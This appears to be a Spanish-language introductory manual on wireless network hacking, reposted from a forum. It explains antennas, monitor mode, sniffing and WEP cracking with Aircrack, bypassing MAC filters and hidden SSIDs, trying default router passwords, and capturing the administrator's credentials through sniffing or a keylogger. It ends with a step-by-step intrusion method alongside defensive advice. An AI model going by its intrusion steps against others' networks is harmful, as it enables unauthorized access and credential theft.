> "Regla de los 6 dB": Un aumento de 6dB en la EIRP duplica el alcance de transmisión o recepción.
Tipos de antenas. Se diferencian tres tipos generales:
1. Omnidireccionales (360 grados en un plano horizontal)
2. Parcialmente direccionales (De 60 a 120º)
> Antena yagi.
3. De alta direccionalidad
El precio de una antena oscila según sus características y su ganancia: las hay de 25 euros, de 120...
Si tu presupuesto es cero, siempre tienes la opción Mc Gyver. Puedes construirte una antena casera. La pega es que el rendimiento no es muy fiable. Aquí el precio puede ir de 7 euros (antena pringles jeje) a lo que queramos.
Consultar el Recopilatorio de textos y enlaces interesantes para más información sobre su construcción.
Aquí os dejo el enlace donde mi compañero lovalost explica un poco el tema (Si estáis interesados os recomiendo lo leáis detenidamente)
http://foro.elhacker.net/index.php/topic,60677.0.html
lluis_11 dejo en un post este enlace (Considero interesante) sobre el montaje de muchos tipos de antenas distintos bien organizadas.
http://www.antenaswireless.net
Es necesario tener conocimientos sobre como instalar la antena, tipos de conectores (SMA, RP-SMA, SMC, MMCX...)
- Conectando una antena wireless:
http://foro.elhacker.net/index.php/topic,65332.0.html
Podremos instalar nuestra antena tanto en el AI como en el AP, cada forma tienen sus ventajas e inconvenientes que se deben valorar desde la perspectiva de la situación en la que nos encontremos. Interesa recordar, que habitualmente las tarjetas PCI traen conectores externos.
- Un Amplificador RF: Consiguen ganancia activa inyectando pontencia continua (DC). Tipos:
> Unidireccionales: Aumentan la potencia de transmisión.
> Bidireccionales: Incremetan también la sensibilidad de recepción.
Se suelen instalar para compensar las pérdidas debidas a una excesiva longitud del cable coaxial que une la antena y el dispositivo inalámbrico.
--------------------------------------------------------------------------------------------------------------------------
Aquí podemos hablar también del warchalking (Es un lenguaje de símbolos normalmente escritos con tiza en las paredes que informa a los posibles interesados de la existencia de una red inalámbrica en ese punto.)
Detectada una red se puede hacer una marca en el suelo, o bien un mapa virtual con su localización (para esto conviene tener un GPS) que además anota las características de la red: SSID, WEP, direcciones MAC, red abierta o cerrada, DHCP, ancho de banda...
De estas características hablaremos más tarde, todo a su tiempo.
No menciono los símbolos del warchalking pero los podéis encontrar en google o el manual de Vicent Alapont (*Bibliografía).
--------------------------------------------------------------------------------------------------------------------------
1.3.- Tipo de interfaz:
Como en ningún manual he visto ninguna explicación de este tipo, porque seguramente se considera excesivamente básica, me he decidido a hablar un poco del tema, porque estoy seguro de que no todo el mundo lo tiene claro y llega a confundir modelo con el enganche (tipo de interfaz)
Seguro que algunos continúan algo perdidos ¿y entonces qué es eso de PCI, PCMCIA, BUS...? Vamos a intentar explicarlo de manera sencilla.
El modelo de tarjeta inalámbrica viene definido por COMPAÑÍA + MODELO + BUS. Vamos a explicar cada apartado:
- Compañía: Algunas de las más conocidas con: Conceptronic, Linksys, icom, D-Link, Cisco/Aironet ... y son las empresas encargadas de la manufactura y venta de la tarjeta. Estas empresas se encargan de montar la tarjeta, no de desarrollar el chipset y sus drivers, eso va a parte. De ahí que diferentes modelos de una misma compañía puedan tener distintos chipsets (son mundos a parte). De ahí que debamos consultar el chipset en el listado que he dado para no llevarnos a engaño.
- Modelo: Una serie de números y letras que marcan un modelo. No apto para disléxicos, ya que algunos modelos difieren de otros tan solo en una "c" o una "r".
- Tipo de interfaz: Llegamos al quid de la cuestión. Esto entra dentro de fundamentos físicos de los computadores (jejeje que informático) y viene a ser la ranura de entrada, el puerto de conexión de la tarjeta, el método de enganche (esta última es una definicón algo chabacana) ¿pero cuándo uso uno y cuando otro? Para responder a esto, vamos a analizar brevemente los métodos de conexión más comunes y en qué situaciones se utilizan:
> PCI (El acrónimo responde a Peripheral Component Interconnect) Es un bus de interconexión de componente periféricos. Es un bus de computadora estándar para conectar dispositivos periféricos directamente a la tarjeta madre de la computadora (bus local). Comentar que PCI permite configurar el dispositivo de manera dinámica. Se suelen utilizar en ordenadores de SOBREMESA.
Es común que tengan conectores para antenas, esto es una factor a tener en cuenta.
>> MINIPCI: Consiste en un tarjeta PCI de pequeño tamaño para PORTÁTILES.
> PCMCIA : (Personal Computer Memory Card International Association, asociación de la industria de fabricantes de hardware para ordenadores portátiles encargada de la elaboración de estándares). Es un dispostivo normalmente utilizado en computadoras PORTÁTILES para implementar sus posibilidades.
Llegamos a un punto aclaratorio clave: CARD BUS Y PC CARD. Las tarjetas PCMCIA DE 16bits pueden recibir el nombre de PC Card y las de 32 bits CARD BUS (este
termino os debería sonar) Ahora lo pongo a parte para tener el esquema claro.
>> CARD BUS: PCMCIA de 32 bits. se pueden usar con un adaptador USB.
> BUS o USB: (Universal Serial Bus) Provee un estándar de bus serie para conectar dispositivos a un PC. Cuando se diceñó este sistema se pensaba en mejorar la capacidad plug-and-play (permitiendo conectar o desconectar dispositivos sin necesidad de reiniciar. Pero no entra en este texto explicar como funciona plug-and-play, investiguen y aprendan jeje) Hoy en día el USB domina y se ha convertido en el método de conexión más usado, debido a
su dinamismo, desplanzando otros estándares de conexión. Pues estos tipos de conexión, para el que no lo sepa, están en la parte de atrás de la torre del ordenador o del portátil. Cuando hablamos de un tarjeta wireless BUS, hablamos de una tarjeta con un cable Bus para conectar. Son fáciles de instalar, sin embargo, a veces no tan potentes como las anteriores (velocidad, encriptación...). Funcionan tanto en PORTÁTILES como en PCs DE MESA.
> CENTRINO: (Centrino Mobile Technology o Tecnología Móvil Centrino en español) Es una iniciativa comercial de Intel para promocionar una combinación determinada de CPU, chipset de la placa base e interface de red inalámbrica en el diseño de un ordenador personal portátil. Actualmente esta combinación consiste en un procesador Pentium M, un chipset de la familia Intel 855 y una conexión de red del tipo Intel PRO/Wireless 2100 (IEEE 802.11b) o PRO/Wireless 2200 (IEEE 802.11g). Esto va integrado en los portátiles de la marca Intel (no se deben confundir el procesador Pentium M y el Centrino). Por
otra parte muchos consumidores han recibido la impresión de que Centrino es la única forma de obtener conectividad inalámbrica en un portátil.
Este tipo de interfaz no puede entrar en modo RF (monitor) usando Windows.
Una vez tengamos esto claro, les pongo un ejemplo de cómo se debería decir que tarjeta tenemos: "Tengo una Conceptronic c54c tipo PCI" (Si aún con esto, no lo entienden, quizás deberían cambiar de hobby por las tabas o algo así)
Ahora dejo algunas fotos (porque una imagen vale más que mil palabras).
PCI
PCMCIA
2.- Software para detectar APs
Existen varios métodos para detectar APs.
- Monitorización activa: (Barrido activo) Consiste en que el AI envía un paquete sonda o baliza (beacon frame) y en caso de existir un AP al que le llegue la señal, contestará con marco de respuesta sonda (request frame) que contiene los datos de la red.
- Monitorización pasiva: Implica la escucha del AI en busca de marcos baliza que emiten los APs.
Teniendo en cuenta que los usuarios de otros sistema operativos (OS) que no sean windows suelen tener unos conocimientos medios de informática avanzados, me referiré tan solo a los programas para windows.
El más conocido es el Net Stumbler de windows, es un programa de código cerrado que monitoriza las redes de forma activa. Utilizado por aficionados espontáneos del wardriving.
Nota: Wardriving no es lo mismo que netstumbling.
3.- Modo monitor o RFMON:
Consiste en poner nuestra tarjeta wireless en escucha para poder captar los paquetes que transmiten otras redes wireless sin estar asociados a ellas. Esto lo explico de manera más detallada en siguiente post:
- Teoría básica sobre el modo monitor en tarjetas wireless:
http://foro.elhacker.net/index.php/topic,64149.0.html
Nota: El modo promiscuo de las tarjetas de red Ethernet 802.33 no es lo mismo que el modo monitor en redes 802.11.
- ¿Cómo poner la tarjeta en modo monitor con Windows?
http://foro.elhacker.net/index.php/topic,64705.0.html
No todos las tarjetas de red pueden entrar en modo monitor, esto se debe tener en cuenta a la hora de comprarla. Si tenéis un tarjeta centrino, es hora de sacar la cartera.
3.1.- Drivers airopeek según el chipset:
Como son muchos los que preguntan si su tarjeta puede entrar en modo monitor o quizás no sepan encontrar los drivers aún conociendo la página a la que deben dirigirse, voy a listar los chipsets compatibles con airopeek para Windows de Wildpackets. Lo que deben hacer es buscar su modelo de tarjeta en la lista que les dí y enterarse de qué chipset utilizan.
Listado:
- Atheros
- Realtek
- Symbol
- Agere
IMPORTANTE: Cuando ya hayamos crackeado WEP deberemos instalar los antiguos drivers de la tarjeta, porque en modo monitor no es posible conectarse a una red. Esto se explica con más detalle en:
¿Por qué hay que reinstalar los drivers originales una vez tienes la wep?
http://foro.elhacker.net/index.php/topic,65590.0.html
4.- Sniffers o "husmeadores" y WEP crackers:
Los sniffers (también denominados analizadores de protocolos o "husmeadores").
El sniffing de paquetes es la práctica de capturar datos de red que no están destinados a tu máquina, generalmente con el propósito de ver tráfico confidencial (contraseñas, datos...)
Para snifar ("olfatear") es necesario entender como transmiten los paquetes las máquinas en una red.
Una vez configurada la tarjeta en modo monitor, trataremos de capturar los paquetes de otras redes o la propia (auditoría de seguridad) con el objetivo de saltarnos sus medidas de seguridad y asociarnos a la red (ancho de banda, datos confidenciales). Entramos en la parte jugosa del manual.
Aquí entran en juego factores de lo bien que esté configurada la red o no. Términos previos:
SSID (Service Set IDentifier) El SSID es un código de 32 caracteres alfanuméricos que llevan los paquetes de una WLAN para indentificarlos como parte de esa red. Por lo tanto todos los dispositivos inalámbricos que intentan comunicarse entre sí deben compartir el mismo ESSID. Las redes cuya infraestructura incorpora un punto de acceso, utilizan el ESSID (E de extendido). Sin embargo nos podemos referir a este como SSID en términos generales.
A menudo al ESSID se le conoce como nombre de la red.
El ESSID de la red ficticia del vecino está por defecto en emisión pública, cualquier usuario usando un stumbler podría detectar esta ESSID (nombre de red) y sabiendo que el ESSID actúa como la relación entre la estación cliente (tu máquina) y el AP, ya tienes el nombre de red, que será vital para asociarse a la red a la que "atacamos".
Es por esto que una medida fundamental de seguridad es desactivar la emisión pública del ESSID (broadcasting), y sino es posible, al menos ocultarlo para que un atacante inexperto no pueda continuar en su intento.
- El más que famoso WEP: (Wireless Equivalency Privacy)
Es el sistema de cifrado incluido en redes estándar 802.11 de los paquetes que se transmiten en una red wireless. El WEP viene inhabilitado por defecto. Un usuario sin conocimientos relativos al tema o un usuario medio no habilitará el WEP al instalar el AP. Esto constituye un gran error de seguridad ya que sino la red queda abierta a todo usuario.
WEP cifra y comprime los datos enviados por ondas de radio. Sin embargo, WEP no es precisamente el sistema de encriptación más potente del mercado. Incluso aunque esté habilitado nuestra red sigue siendo insegura.
Es "rompible" con los denominados WEP crackers . De esto hablaremos más tarde.
Para conocer las vulnerabilidades del cifrado WEP:
Manual de unravel (Hacking wireless - Chincheta)
http://foro.elhacker.net/index.php/topic,54992.0.html
Recuperando la intención de este manual, la compresión sobre todos los apartados en relación con el hacking wireless, voy a explicas de forma técnica el cifrado WEP. Es necesario para comprender esto unos conceptos previos de criptografía (Recomiendo el taller que ha comenzado la revista Hack x Crack HXC en el momento de redactar esto)
Código:
El cifrado WEP no es otro que el algoritmo de encriptación RC4 (Algoritmo de cifrado de flujo, es decir que funciona expandiendo una clave secreta o "seed" la cual es un generador de números psdeualeatoria)
Siguiendo las principales vulnerabilidades que afectan a este algoritmo proporcionado por RSA Security es posible reducir su potencia de 128 bits de cifrado a 24 bits. Lo que conlleva una disminución importante de la seguridad (de 2^104-1 a 2^24-1)
Además se usa un vector de inicialización (conocido como IV de 24 bits) la cual se añade a la seed mencionada antes, y cambia para cada trama. El receptor usa el mismo IV para chequear la integridad del mensaje.
Los IVS son públicos (no cifrados, en texto plano, o sea legibles), y aparecen en los paquetes transmitidos por la red. Como ya he dicho varían, el problema es que la máquina suele reutilizar IVS (no entro en detalles del porqué) y un intruso podría hacer con duplicados, montar una tabla y conocer el texto de un mensaje.
Para ello ha de servirse el intruso de un boli, papel y mucha paciencia para interpretar el flujo.
Pero esto nos llevaría demasiado tiempo, asi que se ha automatizado el proceso.
Esto es en esencia lo que hace un WEP cracker. Tras capturar una serie de paquetes, en el orden de 1 millón para romper un cifrado de 128 bits, estos programas rompen la clave WEP de forma pasiva, analizando los IVs débiles o repetidos.
No se crean que WEP es el único sistema de cifrado que existe, hay muchos más. Este es el más famoso y el más inestable.
El WPA es mucho más seguro, pero este sistema no es funcional en algunos host APs (routers) que funcionan con estándares IEEE 802.11 antiguos.
5.- ¿Qué WEP cracker utilizo en windows?:
Recimiente descubrí que la última versión del Aircrack la v2.1 tiene en su paquete zip una carpeta para windows 32bits. Las pruebas realizada por lovalost (que colabora conmigo en la realización de un taller de wireless, también moderador de este apartado) mostraron como resultados que el aircrack funciona más deprisa que cualquier otro WEP cracker probado en windows, aunque no alcanza la funcionabilidad que tiene en el SO (Sistema Operativo) Linux.
- ¿Cómo utilizar el aircrack en windows? by lovalost (Nuestro gran entendido del foro hacking wireless)
http://foro.elhacker.net/index.php/topic,64705.0.html
6.- Ataque por fuerza bruta al cifrado WEP:
Otra posibilidad para hacernos con la WEP key o clave WEP es realizar un ataque por fuerza bruta al cifrado WEP de un solo paquete. También se puede desplegar un ataque con diccionario. En este post explico la teoría y viabilidad del ataque, además de las herramientas para llevarlo a cabo.
- Ataque por fuerza bruta al cifrado WEP
http://foro.elhacker.net/index.php/topic,64471.0.html
7.- Sacar la clave WEP almacenada en una estación cliente con windows:
Si tenemos acceso físico a una de las máquinas de la red (con sistema operativo Windows) podremos extraer la clave WEP, ahorrándonos tiempo de trabajo.
- Sacando la clave WEP en un Windows XP:
http://foro.elhacker.net/index.php/topic,56008.msg281743.html#msg281743
- Haciendo funcional wzcook en un XP con SP2:
http://foro.elhacker.net/index.php/topic,61344.0.html
8.- Obstáculos en el ataque:
Como ya he dicho se ha desarrollado uno de los ataques más básicos a la red en sus diversas técnicas, sin embargo no por ser básico dejar de ser esencial.
Pero a la hora de hacer este ataque podemos encontrarnos algunas barreras que se despliegan como médidas básicas e insuficientes de seguridad, con la intención de desanimar a script kiddies. Un atacante avanzado habitualmente no suele ser peligroso (igual que un maestro en kung-fu no va por la calle buscando pelea). Las medidas comentadas ahora son las más comunes, no por esto las únicas, pero esto no es un manual avanzado (tiempo al tiempo)
1.- BROADCAST DEL ESSID DESACTIVADO (En un manual lo leí como ESSID cerrado): Al desactivar el BROADCAST del ESSID el AP deja de emitir marcos baliza
(beacon frames) y la red aparece como no en uso. Un programa que haga barrido activo no la detectará y sin embargo si lo conseguiremos mediante un barrido pasivo, ya que los paquetes siguen en el aire. Como ya he dicho el ESSID es el nombre de red y es vital para poder asociarnos a ella, en este caso no podremos visualizarlo y aunque logremos romper el WEP no tendremos nada que hacer.
La solución es la siguiente: Cuando está desactivado (el ESSID se envía en marcos de respuesta -request frames-), el ESSID sigue enviandose en paquetes de petición de asociación y reasociación. Entonces deberemos esperar con un "husmeador" activado a que un usuario se conecte a la red (ese paquete contendrá el nombre de la red). Pero ¿y si los usuarios están constantemente conectados? o ¿y si tenemos prisa?
Existen utilidades para realizar DoS (este ataque que yo sepa sólo es viable en Linux, nuestra punta de lanza en el hacking wierless) como Air-jack toolkit que, entre otras, lleva una aplicación llamada essid_jack, cuya función concreta es provocar que los clientes se tengan que reasociar al punto de acceso y así capturar el paquete de asociación que contiene el ESSID. Pero esto ya entra en un nivel alto en el que no entraremos aquí, así que pueden investigar o esperar hasta que publiquemos el manual avanzado.
2.- FILTRADO DE DIRECCIONEs MAC (ACL): (*Consultar MAC en vocabulario) Esta medida consiste en permitir solamente la conexión a cierto equipos atentiendo a su MAC. Sin embargo es posible cambiar la dirección MAC de nuestra tarjeta utlizando software específico, de este modo suplantaríamos la identidad de una de las máquinas de confianza (trusted). Esta técnica se conoce como MAC spoofing. Para saber que MAC deberemos emular, utilizaremos un husmeador (el más idóneo es Kismet).
- Cambio de dirección MAC:
http://foro.elhacker.net/index.php/topic,63350.0.html
9.- Medidas de seguridad:
- Físico:
Consiste en utilizar materiales que mitiguen las ondas de radio impidiendo que salgan de los límites del edificio.
-En la capa de enlace (capa 2):
> Habilitar WEP con el mayor número de bits posible.
> Habilitar WPA en vez de WEP si es que nuetros hardware es compatible (Tiene que ser compatibles tanto el AP como los AIs, deben por así decirlo, hablar en el mismo idioma para entenderse)
> Deshabilitar el broadcast (emisión pública) del ESSID (este método es bastante bueno porque la red no aparecerá como una red en uso). Pero no es suficiente como hemos visto, un atacante experto podría saltarse esta protección.
--------------------------------------------------------------------------------------------------------------------------
IMPORTANTE: Además de ocultar el ESSID, hay que cambiarlo para que no esté en predeterminado, porque sino sacando la OUI de la MAC nos bastaría para conocer el modelo de AP y buscar userID/password por defecto.
- Relación de la OUI con el modelo de AP:
http://standards.ieee.org/regauth/oui/oui.txt
--------------------------------------------------------------------------------------------------------------------------
> Habilitar el filtrado de direcciones MAC.
> Deshabilitar el DHCP.
> Cambiar la contraseña por defecto del router. En caso de que un atacante acceda a la red podría cerra puertas a otros usuarios, montar una backdoor (puerta trasera) mapeando los puertos de la NAT para conectarse de forma remota...
> Cambio habitual de la clave WEP, que es estática. De este modo un atacante podría perder el interés en nuestra red, ya que tendría que atacarla cada vez que se quisiese asociar.
> Cambiar la IP por defecto del AP.
Se han comentado las medidas de protección, sin embargo dejo el tema de detección de intrusos y utización de IDS (En nuestro caso WIDS ) para el manual avanzado. Pues este ya tiene una extensión considerable y sería entrar en demasiada profundidad. En el manual avanzado se incluirán algunas lecciones para una mejor comprensión:
- Capas OSI
- Criptografía
- Muchas más
10.- Accediendo al router (AP) de nuestra red para configurarlo (User ID/password por defecto):
Todos los APs vienen con nombre de usuario y contraseña por defecto de fábrica. Si ha sido instalado por un usuario que se sirve de una guía rápida o por un técnico negligente, el AP seguirá teniendo el mismo user ID y password que antes de salir de la caja.
Os dejo a continuación una página mencionada en este foro que tiene los users ID/passwords por defecto de las grandes compañías que comercializan APs que está además en constante actualización y te será muy útil.
http://www.phenoelit.de/dpl/dpl.html
Voy a comentar también que en los dos routers que he tenido la ocación de leer sus manuales (siendo de diferente distribuidoras) tenían como user ID por defecto: Admin y como contraseña por defecto: default.
Así que si no encontráis el AP que os interesa en el anterior web probad con lo segundo.
En la actualidad se han descrito en algunos topics del foro técnicas para sacar la contraseña de un router:
+ Sacando la contraseña de un router:
http://foro.elhacker.net/index.php/topic,62224.0.html
Por dividir las técnicas en dos ramas diferentes y que se entienda mejor el anterior post:
1.- Técnicas para filtrar los paquetes de una red, entre los cuales están los que van dirigidos al router, cuando el administrador se loguea en él.
Estas técnicas se utilizan cuando nosotros no somos el administrador de la red sino un intruso en ella. La intención es extraer el user ID (nombre de usuario) y password de acceso al router cuando el administrador se loguee.
Para ello nos podemos servir de un sniffer y técnicas de implementación del anterior ataque: ARP spoofing, ataques man-in-the-middle...
Manual de ARP spoofing by Fakedos: (Muy bueno y fácil de entender. Explica los tipos de redes: de hubs o conmutadas -switches-)
http://fakedos.all-inone.net/tecdocexplo/arpspoofing.htm
Metodología para hacerse con el nombre de usuario y contraseña del router si hemos realizado una intrusión a la red y no somos los administradores de esta:
1.- Instalar un sniffer y poner la tarjeta de red en modo promiscuo.
2.- Filtrar los protocolos que nos interesan para que no se nos desborde de la cantidad de datos: filtramos telnet y HTTP (que son los caminos de acceso al router)
3.- Se pueden utilizar técnicas de implementación del sniffing (Esto está descrito con anterioridad)
También podríamos instalar un keylogger en la máquina que utiliza el administrador. Hagan volar su imaginación.
2.- Si nos hemos olvidado de la contraseña de nuestro router, o nunca la supimos porque nos la instaló un técnico y en ese momento no sabíamos ni lo que estaba haciendo. Se subdividen básicamente en (detalladas en el anterior post):
- Ataque por fuerza bruta.
- Utilización de alguna vulnerabilidad (mediante exploit) conociendo el modelo de router (Se busca información en google. Esto será efectivo si el firmware no está actualizado y otros usuarios con conocimientos avanzados en programación publicaron información en torno a posibles fallos para ganar acceso al router)
- El log de la cookie.
- Llamada al técnico.
- Resetear el router y configurarlo de nuevo con los datos de conexión. Al resetear el router este vuelve a su configuración por defecto de fábrica, es conveniente buscar información de nuestro AP en la página oficial de este, donde seguro se explica en las FAQs como resetearlo, configurarlo...
Conviene aclarar que la contraseña del router no es la contraseña de red ni mucho menos, se tiende a confudir por usuarios inexpertos. La contraseña de red como ya hemos dicho es la WEP key, de ahí la importancia de saber crackearla.
11- ¿Por qué nos centramos tanto en WEP?
El protocolo de cifrado WEP, a pesar de las futuras revisiones, mejoras, alternativas... seguirá funcionando durante mucho tiempo, sin importar cómo de buenos y seguros sean sus sustitutos. Los motivos son los siguientes y conviene tenerlos en cuenta:
1- Es fácil configurar WEP y cualquier sistema conforme con el estándar 802.11 lo soporta, no ocurre lo mismo por ejemplo con WPA.
2- El hardware heredado podría no soportar los nuevos protocolos de seguridad y muchos usuarios no se desharán de él a pesar de las recomendaciones, nuevos estándars... ya que han invertido en su equipo un dinero que desean rentabilizar.
3- El hardware más moderno pasará a utilizar el nivel de seguridad del anterior harware para poder interactuar con él.
4- Muchos administradores de red debido a su ignorancia o pereza no actualizarán el firmware de sus sistemas para soportar sustitutos de WEP más seguros.
5- Los nuevos sistemas de seguridad conllevarán un esfuerzo en mantenerse actualizado y comprensión. Algunas pymes (pequeñas y medianas empresas) que disponen de estos métodos de intercomunicación entre máquinas se oponen por motivos económicos.
6- Algunas implementaciones de las especificación 802.11i requerirá renovar el hardware en su totalidad.
7- Todavía se pueden oir comentarios de los autodenominados "expertos" que opinan que WEP es un protocolo lo suficientemente seguro para redes domésticas y
pequeñas empresas.
De este modo los ataques contra WEP están hoy más de moda que nunca, a pesar de que WEP hace tiempo que quedo obsoleto. Sin embargo romper el WEP no es el último paso (como muchos atacantes consideran) en el ataque a una red. Por último cabe destacar, que los usuarios que llevan a cabo estos ataques sirviéndose de una guía paso a paso, no merecen otra categoría dentro de las comunidades de seguridad informática y hacking, que la de script kiddies o lammers.
Vamos a dar las características que debe reunir un usuario avanzado o entendido:
> Conocimiento de diversas técnicas de ataque:
- DoS (Ataques de Denegación de Servicio)
- Ataques de intermediario sobre la capa física.
- Inyectar tráfico para acelerar la ruptura de WEP.
- Conocer la estructura de los paquetes de las redes 802.11 y sus correspondientes marcos.
- Saber llevar el ataque a la zona cableada de la red.
- Saltar pequeñas barreras como el filtrado de direcciones MAC y ESSID cerrados, que hoy en día a pesar de su debilidad como medidas de seguridad siguien desanimando a muchos atacantes.
- Ruptura de 802.1x
- Inyectar tráfico inalámbrico cifrado.
- Creación de una puerta trasera (backchannel)
- Montaje de una red segura, desplegar VPNs
Así el pérfil de usuario aficionado e interesado momentáneamente en el tema es:
- Ruptura del cifrado WEP con sistema operativo Windows.
- Realizar barridos activos con una copia de Netstumbler.
quizás debería preguntarse en que grupo se enmarca y ¿qué medidas podría tomar para avanzar y aumentar sus conocimientos? No olvide que este texto es una simple introducción al tema de la seguridad wireless, que puede resultar en algunos niveles realmente complicado y requiere conocimientos sobre:
- Diferentes protocolos
- Criptografía
- Topología de redes
- Capas OSI
- Protocolo TCP a fondo
Pero antes debemos conocer unos conceptos básicos que serán nuestra base de apoyo en el avance. En estos momentos se está trabajando en el desarrollo de un taller o proyecto que comprenda algunos de estos puntos más avanzados explicados de la forma más sencilla posible. Por el momento se está trabajado en solucionar las dudas más habituales al iniciarse en el tema:
- ¿Qué tarjeta me recomiendan? ¿Cómo ponerla en modo monitor? ¿Qué es un chipset y para qué sirve?
- ¿Puede mi tarjeta entrar en modo monitor?
- ¿Qué programa uso para romper WEP en windows?
- ¿WEP o WPA?
De todas formas recomiendo encarecidamente que visiten el Recopilatorio de textos y enlaces de interés (en constante actualización) donde podrán encontrar respuestas a más preguntas como estas y a otras más avanzadas. No olviden la lectura de todas las chinchetas.
- Recopilación de textos y enlaces de interés:
http://foro.elhacker.net/index.php/topic,64843.0.html
- F.A.Q (Frequency Asked Questions):
http://foro.elhacker.net/index.php/topic,65591.0.html
12.- Conclusiones:
Las redes Wireless son todavía muy inseguras y es por esto que la política de seguridad de algunas empresas las prohíbe tajantemente. Debido a la dificultad de controlar la expansión de las ondas de radio, estas traspasan los límites del edificio, "tendiendo una mano" al intruso.
Cuando instalas un AP en tu domicilio, se dan varios casos que van a repercutir en la posterior seguridad de este AP.
- Lo instalas tú con un manual rápido sin habilitar WEP, ni cambiar la SSID por defecto, ni la IP por defecto del router...
- Lo instala un técnico incompetente con conocimientos mínimos que le bastan solamente para que funcione.
- Lo instala una empresa despreocupada por sus usuarios (Oí decir que telefónica no configuraba el router)
- Te lo instala un técnico competente o tú mismo habiendote leído esto. ---> Tendrás el culo bastante a salvo. (Recuerden que nada es seguro al 100%)
13.- BIBLIOGRAFÍA:
El taller de redes WIFI de Vic_THOR:
http://www.hackxcrack.com/phpBB2/viewtopic.php?t=21310
Manual de sniffers de LorD_Darkness:
http://ccia.ei.uvigo.es/docencia/SSI/SniffersPDF.pdf
Manual de redes wireless de Vicent Alapont:http://www.telefonica.net/web2/telamarinera/facu/seguridad_en_redes_inalambricas_by_vicent_alapont.zip
Diccionario enciclopédico Wikipedia: http://es.wikipedia.org/wiki/Portada --> Una maravilla para entender temas profundos que nos superan, buscar definiciones. Un consejo, tenedlo siempre a mano.
Taller práctico de intrusión en redes locales de Gospel (realmente bueno)
http://foro.elhacker.net/index.php/topic,45618.0.html
ESTE FORO que tanto me está enseñando sobre el tema.
Espero no dejarme ninguno.
Más mis conocimientos escasos sobre la seguridad informática.
14.- Expansión del manual:
Mi compañero moderador lovalost y yo estamos trabajando, de forma conjunta con el staff de elhacker en un taller avanzado sobre hacking wireless.
Pueden leer más sobre el proyecto manual de hacking wireless aquí:
http://foro.elhacker.net/index.php/topic,62868.0.html
15.- Metodología para hackear una red wireless:
1.- Comprar una tarjeta WNIC (AI)
2.- Hacer un barrido activo o pasivo para detectar las redes de los alrededores.
3.- Poner la tarjeta en modo monitor o RFMON.
4.- Utilizar un WEP cracker (Aircrack) para obtener el WEP key (contraseña de red)
Con el nombre de red ESSID y el WEP key ya podemos asociarnos y autentificarnos en la red.
5.- En nuestro camino quizás necesitemos sortear una serie de barreras como el filtrado de direcciones MAC, ESSID cerrados...
6.- En caso de acceso físico a una estación cliente de la red con Windows XP, utilizar un programa de recuperación de la WEP key.
7.- Proximamente se desarrollarán ataques más avanzados como inyección de tráfico para acelerar el proceso de ruptura de WEP, ataques hombre en medio (man-in-the-middle)...
DEFINICIONES:
Algunas de estas definiciones están extraídas del taller de Vic_THOR, que realizo un buen glosario de consulta.
Autenticado y asociado: Estado en el que un dispositivo wireless se une a la red de forma correcta y puede participar de los servicios que se ofrecen
Autenticado y disociado: Estado en el que un cliente ha sido reconocido por los dispositivos de la red wireless pero que todavía no puede emitir datos ni participar de los recursos.
Balizas/Beacons: Tramas de administración o sondas que emiten los puntos de acceso para informar a sus clientes o a otros puntos de acceso de su presencia y de otros datos.
BSSID: La MAC del punto de acceso
Desautenticado y disociado: Estado en el que un cliente está desconectado de la red y no se asoció con el Punto de Acceso
Filtrado de MAC: Método de configuración de seguridad en puntos de acceso que restringe a determinadas direcciones MAC la posibilidad de unirse a la red y autenticarse.
IEEE: Instituto de Ingenieros Eléctricos y Electrónicos, una asociación estadounidense dedicada a la estandarización.
Punto de acceso: (AP) Dispositivo que comunica redes de cable e inalámbricas.
Red inalámbrica (de área local) o WLAN o WIFI: El nombre técnico para denominarlas es redes 802.11. El protocolo IEEE 802.11 es un estándar de protocolo de comunicaciones de la IEEE que define el uso de los dos niveles más bajos de la arquitectura OSI (capas física y de enlace de datos), especificando sus normas de funcionamiento en una WLAN (Wireles LAN - red de área local)
SSID de difusión: Identificador de servicio vacío, es el equivalente a un ESSID con el valor Any, en el cual cualquier cliente puede conectarse a la WLAN.
WEP: Protocolo de seguridad para el cifrado del tráfico WLAN
Wi-Fi: Organización que certifica la interoperabilidad de dispositivos 802.11 como un estándar compatible y global de redes WLAN
WLAN: LAN inalámbrica
WPA: Acceso protegido Wi-FI que utiliza las características de 802.11i
802.11i: Estándar de seguridad para WLAN, combina el uso de 802.1x y protocolos de cifrado TKIP/CCMP que ofrece autenticación de usuario (no de dispositivo), confiabilidad e integridad de los datos.
16.- ENLACES DE INTERÉS:
17.- Anotaciones extras sobre la seguridad de redes wireless:
http://foro.elhacker.net/index.php/topic,56008.msg279739.html#msg279739
18.- Movernos en la red wireless:
http://foro.elhacker.net/index.php/topic,56008.msg279733.html#msg27973
19.- Utilizando un live CD de linux (Live CD específico para la auditoría inalámbrica, por si no queremos desinstalar nuestro windows, o instalar dos sistemas operativos)
http://foro.elhacker.net/index.php/topic,56008.msg279383.html#msg279383
20.- Manual de cómo hace un live-CD por BADBYTE-K (Aquí se puede enterar de lo que es un live-CD entre otras cosas)
http://foro.elhacker.net/index.php/topic,20178.0.html
21.- URL posteada por Fandango sobre wireless, Linux y wardriving en pdf:
-Herramientas de configuración de redes wireless en linux
(iwconfig, iwpriv)
http://jornadespl.upc.es/vell-02/jplupc2003/Mataro/wireless.pdf
------------------------------------------------------------------------
Depués de unas cuantas horas de redacción, correción, modificación, mejora y ampliación del texto, creo que me ha quedado un texto aceptable de iniciación en seguridad de redes 802.11
Lo he realizado con la intención de que cualquier usuario medio pueda comprenderlo en su totalidad.
Está escrito nada más que con finalidad didáctica y profundizar en el conocimiento de la inseguridad de las redes WLAN.
Lo que hagáis con esta información es vuestro asunto, no me resposabilizo.
Espero vuestras correciones, y ampliaciones. También lo que me haya podido dejar en el tintero.
Se lo quiero dedicar a mi vecino y amigo Kiko, por aguantarme cuando le doy la bara con el hacking y por prestarse como conejillo de indias para mis pruebas.
Saludos a todos, zerealkiller.
Documento Original
Suscribirse a:
Entradas (Atom)